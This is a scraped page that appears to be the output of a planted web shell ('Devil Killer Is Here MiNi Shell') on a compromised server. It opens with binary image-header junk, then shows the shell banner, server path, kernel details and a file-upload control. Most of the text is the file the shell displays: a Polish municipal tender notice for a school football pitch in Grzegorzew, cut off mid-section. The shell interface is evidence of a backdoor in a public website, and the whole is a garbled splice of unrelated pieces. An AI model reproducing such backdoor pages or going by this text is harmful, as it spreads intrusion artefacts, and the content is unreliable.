JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220525/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220525/0017698901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ogólnodostępnego boiska do piłki nożnej i skoczni do skoku w dal przy Zespole Szkolno-Przedszkolnym w Grzegorzewie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Grzegorzew</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 311019148</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac 1000-lecia Państwa Polskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grzegorzew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-640</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">632718255</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">632718222</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">grzegw@grzegorzew</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.grzegorzew.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ogólnodostępnego boiska do piłki nożnej i skoczni do skoku w dal przy Zespole Szkolno-Przedszkolnym w Grzegorzewie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-677e3257-db46-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00176989</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00049229/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Budowa ogólnodostępnego boiska do piłki nożnej i skoczni do skoku w dal przy Zespole Szkolno-Przedszkolnym w Grzegorzewie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">epuap https://epuap.gov.pl/wps/portal<br/>miniportal https://miniportal.uzp.gov.pl/<br/>poczta elektroniczna grzegw@grzegorzew.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na EPUAP<br/>ma dostęp do formularza do złożenia, zmiany, wycofania oferty lub wniosku, formularza do komunikacji.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług<br/>administracji publicznej (ePUAP).<br/>3. Wykonawca przystępując do niniejszego postępowania akceptuje warunki korzystania z miniPortalu określone w Regulaminie<br/>miniPortalu oraz zobowiązuje się przestrzegać jego postanowień.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy wynosi 150 MB.<br/>5. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>6. Zamawiający przekazuje link do postępowania. Dane postępowania można wyszukać również na Liście wszystkich postępowań w<br/>miniPortalu klikając wcześniej opcję &#34;Dla Wykonawców&#34; lub ze strony głównej z zakładki &#34;Postępowania&#34;.<br/>7. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy PZP, podmiotowe środki dowodowe, pełnomocnictwa,<br/>zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach txt, rtf, pdf, doc, docx, odt.<br/>Zamawiający dopuszcza komunikację elektroniczną na adres email: grzegw@grzegorzew.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z dokumentami SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z dokumentami SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Obiekt składa się z boiska do piłki nożnej, skoczni do skoku w dal.<br/>Boisko do piłki nożnej. Boisko zaprojektowane o wymiarach 59x30m i polu gry 55x26m pokryte jest trawą syntetyczną w kolorze zielonym. Na płycie boiska zamontować dwie bramki do piłki nożnej 5x2m. Zaprojektowano trzy ławki 5-miejscowe w formie siedzisk trybunowych z oparciem o wysokości 25 cm, mocowane do konstrukcji ze stalowego, ocynkowanego profilu. Belka siedziska wykonana z profilu 60x40. Rozstaw siedzisk: 500 mm. Konstrukcja przygotowana do osadzenia w fundamencie zgodnie z zaleceniami producenta. Siedziska wykonane z polipropylenu, odporne na niskie i wysokie temperatury oraz na promieniowanie UV. Siedziska winny posiadać atesty trudnozapalności, toksyczności i wytrzymałości. Siedziska w kolorze zielonym. Wokół boiska przewidziano opaskę z grysem granitowym szarym frakcja 16/22 – grubość warstwy 7cm i obrzeżem betonowym 8x30cm. Od strony zachodniej i wschodniej (krótsze boki boiska) przewiduje się piłkochwyt o wysokości 6,0m. Od strony północnej i południowej projektowany jest piłkochwyt o wysokości 4,0m. Piłkochwyty – zarówno konstrukcja jak i wypełnienie siatką oraz brama i furtka w kolorze ciemnozielonym (RAL 6005).<br/>Od strony zachodniej w związku z lokalizacją piłkochwytu w niewielkiej odległości (ok. 40 cm) od istniejącego płotu betonowego, należy tak naciągnąć siatkę by piłka nie uderzała w płot betonowy (m.in. montować jako oddzielna formatka w każdym przęśle na linkach pionowych rozdzielczych). Dodatkowo poniżej linki rozdzielczej zamontowanej na wysokości 2m zastosować formatki siatki PP o oczkach 45x45x4mm. Fundamenty, w których osadzone są słupki należy wykonać według zaleceń konkretnego dostawcy i zabezpieczyć izolacja p-wilgociową. Furtka oraz brama systemowe z kształtowników prostokątnych zamkniętych ze stali ocynkowanej malowanej proszkowo w kolorze ciemnozielonym RAL 6005. Wypełnienie w formie pionowej palisady z płaskowników / kształtowników zamkniętych o szer. max 3 cm w rozstawie max 15 cm. Wyposażone w zamek.<br/>Skocznia do skoku w dal<br/>Skocznia do skoku w dal składa się z rozbiegu z nawierzchnią poliuretanową o wymiarach 1,22m x 20,0m w kolorze ceglastym oraz zeskoku 3,0x8,0m wypełnionego piaskiem. Rozbieg do skoku w dal o wym. 20x1,22m<br/>Murek klinkierowy H=1,2m<br/>Za przystankiem autobusowym zaprojektowano przedłużenie istniejącego murku klinkierowego zlokalizowanego od ul. Kolskiej. Murek wykonany na wysokość ok. 1,2m (odpowiadać ma wysokości murku istniejącego) z cegły klinkierowej klasy 25 w kolorze ceglastym, na zaprawie cementowej M5, ze zbrojeniem co drugą warstwę dwoma prętami fi8. Murek posadowiony na fundamencie wylanym z betonu C25/30 zaizolowanym w gruncie od góry i obustronnie wodoszczelną zaprawą cementową. W miejscach, gdzie do muru przylegać będzie skarpa wykonać izolację pionową przeciwwodną z papy zgrzewalnej G200, od strony nasypu ułożyć dodatkowo flizelinę ochronną.<br/>Ogrodzenie z siatki H=1,2m<br/>Pozostałe ogrodzenia z siatki h=1,2m (od ul.Kolskiej) w kolorze zielonym. Wykonane jako systemowe ogrodzenie z słupków z rury stalowej fi 60, wysokość 210 cm, rozstaw słupów co 200 cm. Rura kotwiona w gruncie za pomocą betonowych fundamentów ok. 40x40 cm – wg wytycznych dostawcy ogrodzenia. Fundamenty zaizolować przeciwwilgociowo.<br/>Rozwiązania wyposażenia budowlano-instalacyjnego<br/>Obiekt wyposażony w instalację oświetlenia oraz monitoringu – wg części instalacyjnej projektu.<br/>Ustalenia generalne<br/>Wszystkie użyte w czasie realizacji inwestycji materiały i urządzenia, winny posiadać właściwe dokumenty pozwalające na ich stosowanie w budownictwie na terenie Polski. Roboty budowlane należy wykonać zgodnie z warunkami technicznymi i odbioru robót budowlanych. Przed przystąpieniem do robót budowlanych kierownik budowy jest zobowiązany sporządzić „Plan Bioz” zgodnie z wytycznymi podanymi w opisie architektonicznym w załącznikach do projektu budowlanego. Podczas prowadzenia robót budowlanych należy ściśle przestrzegać przepisów bhp dotyczących odpowiednich robót w trakcie budowy należy stosować materiały posiadające atesty ITB oraz zaprawy produkowane fabrycznie. Dopuszcza się wykonanie zapraw na budowie, ale pod warunkiem kontrolowania dozowania składników oraz wytrzymałości zaprawy przez osobę o odpowiedniej kwalifikacji niezależną od wykonawcy.<br/>Obiekt powinien być realizowany pod nadzorem osób posiadających odpowiednie uprawnienia wykonawcze.<br/>Zasilanie elektroenergetyczne<br/>Projektowana instalacja oświetlenia boiska będzie zasilana z rozdzielnicy głównej istniejącego budynku hali sportowej. Istniejącą rozdzielnicę główną RG należy rozbudować zgodnie ze schematem w celu zainstalowania zabezpieczenia obwodu rozdzielczego zasilającego rozdzielnicę oświetlenia boiska TOZ. Rozdzielnicę TOZ wykonać zgodnie ze schematem zasilania w obudowie zewnętrznej na fundamencie. Obudowę przystosować do zamykania na zamek patentowy. Prefabrykację rozdzielnicy należy wykonać zgodnie z normą wieloarkuszową PN-EN 61439 &#34;Rozdzielnice i sterownice niskonapięciowe&#34;, a następnie dokonać oceny zgodności według dyrektywy LVD2014/35UE i oznakować znakiem CE.<br/>Linie kablowe nn<br/>Wewnętrzną linię zasilającą rozdzielnicę TOZ wykonać kablem YKYżo 5x6mm2 ułożonym w ziemi. Obwód zasilania boiska wykonać kablem YKYżo 5x6mm2 ułożonym w ziemi do masztów oświetleniowych. Obwód zasilania skrzynki kamer wykonać kablem YKYżo 3x2,5mm2 ułożonym w ziemi do masztu M3. Kable nn układać w ziemi na głębokości 0,7m w rurze osłonowej N250 O75, linią falistą z zapasem 3% na 10cm podsypce z piasku. Ułożone kable zasypać min. 10 cm warstwą piasku oraz 15 cm warstwą rodzimego gruntu, przykryć folią koloru niebieskiego, a następnie zasypać gruntem rodzimym zagęszczanym w warstwach co 20cm. Przy zbliżeniach i skrzyżowaniach kabli z uzbrojeniem terenu, jak również pod nawierzchnią utwardzoną i płytą boiska stosować rury osłonowe grubościenne N450 o średnicy 75mm. W wykopie razem z kablem zasilającym prowadzić uziom wykonany z płaskownika stalowego ocynkowanego 25x4mm, który przyłączyć do zacisków uziemiających słupów. Linie kablowe należy oznakować na całej długości (co 10m, przy skrzyżowaniach, przepustach, wejściu do budynku) oznacznikami z tworzyw sztucznych nakładanymi na kable, które powinny zawierać co najmniej nazwę relacji linii, oznaczenie kabla, użytkownika kabla i rok budowy linii. Przed zasypaniem rowów kablowych wykonać inwentaryzację geodezyjną linii przez uprawnionego geodetę. Po zakończeniu prac ziemnych przywrócić pierwotny stan powierzchni terenu. Skrzyżowania i zbliżenia z istniejącym i budowanym uzbrojeniem podziemnym rozwiązywać zgodnie z normą SEP-E-004. Wejście kabla do budynku hali sportowej wykonać jako wodo- i gazoszczelne przy zastosowaniu rozwiązań systemowych.<br/>Oświetlenie boiska<br/>Projektuje się oświetlenia boiska za pomocą opraw typu naświetlacz LED<br/>Sterowanie oświetleniem boiska<br/>Projektuje się ręczne sterowanie oświetleniem boiska, przy pomocy łącznika pulpitowego z dźwignią obrotową, zainstalowanego w rozdzielnicy TOZ.<br/>Instalacja monitoringu wizyjnego ip<br/>Projektuje się instalację monitoringu wizyjnego boiska jako rozbudowę istniejącego systemu monitoringu wizyjnego hali sportowej.<br/>Część obserwacyjną wykonać z wykorzystaniem kamer IP zewnętrznych<br/>Kamery instalować na masztach oświetleniowych, na wysokości ok. 7m, z wykorzystaniem uchwytów słupowych oraz puszek montażowych. Kamery podłączyć do złącz RJ45 na kablach FTP poprzez ograniczniki przepięć<br/>Skrzynkę kamer wykonać w obudowie szczelnej o wymiarach 311x221x137mm, IP65,zamykanej na zamek patentowy. Skrzynkę montować na maszcie nr M3 na wysokości ok. 4m.<br/>W skrzynce kamer SK instalować przełącznik sieci LAN 8x 10/100 Mb/s PoE, 2x Uplink 10/100/1000 Mb/s, 1x SFP, zasilany z gniazda 2x230V zamontowanego wewnątrz skrzynki.<br/>Przełącznik wyposażyć w moduł światłowodowy SFP WDM SM <br/>Moduł połączyć z przełącznicą światłowodową kablem krosowym LC-LC SM.<br/>W budynku hali sportowej, w szafie dystrybucyjnej SD, instalować media konwerter SFP/10/100/1000BaseT wyposażony w moduł SFP WDM SM o parametrach jak wyżej. Moduł połączyć z przełącznicą światłowodową kablem krosowym LC-SC SM. Port miedziany konwertera połączyć z istniejącym przełącznikiem LAN kablem krosowym RJ45-RJ45.<br/>Pola widzenia i nastawy obiektywów kamer wyregulować do uzyskania żądanego pola widzenia według wymagań Inwestora. Skonfigurować transmisję danych wizyjnych do istniejącego rejestratora i włączyć do konfiguracji nagrywania i obserwacji obrazu systemu monitoringu hali sportowej. Opracować dokumentację powykonawczą i instrukcję użytkowania systemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45451000-3 - Dekorowanie</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45312200-9 - Instalowanie przeciwwłamaniowych systemów alarmowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i<br/>odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów: 1. Cena (C) - waga kryterium<br/>60%; 2. Okres gwarancji i rękojmi dla przedmiotu zamówienia - waga kryterium 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki dotyczące określonej sytuacji finansowej lub ekonomicznej:<br/><br/>Zamawiający określa w powyższym zakresie następujący warunek dotyczący odpowiedniego ubezpieczenia odpowiedzialności cywilnej:<br/>Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 1 000 000,00 zł<br/><br/>Warunki dotyczące zdolności technicznej lub zawodowej:<br/><br/>Zamawiający określa w powyższym zakresie następujący warunek<br/><br/>dotyczący odpowiedniego doświadczenia i osób skierowanych do realizacji zamówienia:<br/><br/>Wykonawcy są zobowiązani wykazać, iż nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej 1 robotę budowlaną polegającą na budowie/przebudowie/ remoncie obiektu sportowego o wartości nie mniejszej niż 1 000 000,00 zł., która została wykonana w sposób należyty, w tym zgodnie z przepisami prawa budowlanego i prawidłowo ukończona<br/><br/><br/>Uwaga:<br/><br/>- przez wykonanie (zrealizowanie i zakończenie) należy rozumieć doprowadzenie co najmniej do podpisania protokołu końcowego odbioru robót;<br/><br/>- wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą spełnić ten warunek w sposób następujący – przynajmniej jeden z Wykonawców musi spełnić ten warunek.<br/><br/><br/>b)	Wykonawca dysponuje następującymi osobami, które będą uczestniczyły w wykonywaniu zamówienia, legitymującymi się odpowiednimi kwalifikacjami zawodowymi, wykształceniem i doświadczeniem niezbędnym do wykonania zamówienia tj.: co najmniej jedną osobą, która pełnić będzie funkcję Kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej o zakresie zgodnym z przedmiotem zamówienia. Osoba ta musi posiadać co najmniej 5-letnie doświadczenie w roli kierownika budowy lub kierowania robót. Zamawiający przekazuje wzór Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, który należy wypełnić i złożyć na wezwanie Zamawiającego w celu potwierdzenia spełnienia w/w warunku udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie Wykonawcy, w zakresie art.108 ust.1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2021r., poz.275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/><br/><br/>2)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie wynikającym z art. 109 